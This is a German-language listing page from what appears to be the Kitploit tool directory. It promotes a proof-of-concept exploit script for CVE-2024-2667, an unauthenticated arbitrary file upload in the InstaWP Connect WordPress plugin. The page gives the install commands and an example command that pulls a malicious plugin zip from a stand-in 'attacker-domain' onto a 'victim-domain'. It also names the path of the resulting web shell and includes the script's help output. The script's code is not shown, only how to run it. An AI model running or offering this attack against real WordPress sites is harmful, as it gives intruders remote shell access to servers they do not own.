Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-2667-Poc — PoC-Exploit für CVE-2024-2667: automatisierter Upload beliebiger Dateien und Shell-Zugriff durch unzureichende Dateivalidierung im REST-API-Endpunkt des WordPress-Plugins InstaWP Connect. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-2667-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubnxploited/cve-2024-2667-poc

CVE-2024-2667-Poc

PoC-Exploit für CVE-2024-2667: automatisierter Upload beliebiger Dateien und Shell-Zugriff durch unzureichende Dateivalidierung im REST-API-Endpunkt des WordPress-Plugins InstaWP Connect.

Repository anzeigen
6vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-2667-Poc 🚀

Beschreibung

Das InstaWP Connect – 1-click WP Staging & Migration Plugin für WordPress ist anfällig für das Hochladen beliebiger Dateien aufgrund unzureichender Dateivalidierung im REST-API-Endpunkt /wp-json/instawp-connect/v1/config in allen Versionen bis einschließlich 0.1.0.22. Dadurch können nicht authentifizierte Angreifer beliebige Dateien hochladen.

Skript-Verwendungsanleitung ⚙️

Installationsanforderungen

BeschreibungDetailsIcon
Erforderliche Bibliotheken installierenVerwenden Sie pip, um die erforderlichen Python-Bibliotheken zu installieren: requests und beautifulsoup4.🛠️
Befehl zum InstallierenFühren Sie aus: pip install requests beautifulsoup4.📥

Skript ausführen

BeschreibungDetailsIcon
Skript ausführenFühren Sie das Skript über die Befehlszeile mit den erforderlichen Argumenten aus.🚀
Erforderliche Argumente- -up: Plugin-URL (z. B. http://attacker-domain/malicious-plugin.zip).
- -u: Ziel-WordPress-URL (z. B. http://victim-domain/).🔧
Beispielbefehlpython CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/📜

Schwachstelle prüfen

BeschreibungDetailsIcon
VersionsprüfungDas Skript untersucht die Datei readme.txt auf die Version des Ziel-Plugins.🔍
Verwundbare VersionWenn die Version <= 0.1.0.22 ist, gibt das Skript aus: The site is vulnerable.⚠️
Sichere VersionWenn die Version > 0.1.0.22 ist, gibt das Skript aus: The site is not vulnerable.✅

Shell-Speicherort

BeschreibungDetailsIcon
Shell-PfadWenn der Upload erfolgreich ist, ist die Shell erreichbar unter:🐚
wp-content/plugins/instawp-connect/shell.php.

Verwendung -help

usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

options:
  -h, --help            show this help message and exit
  -up URL_PLUGIN, --url_plugin URL_PLUGIN
                        URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
  -u URL_TARGET, --url_target URL_TARGET
                        URL of the target WordPress site (e.g., http://victim-domain/).
Tool herunterladen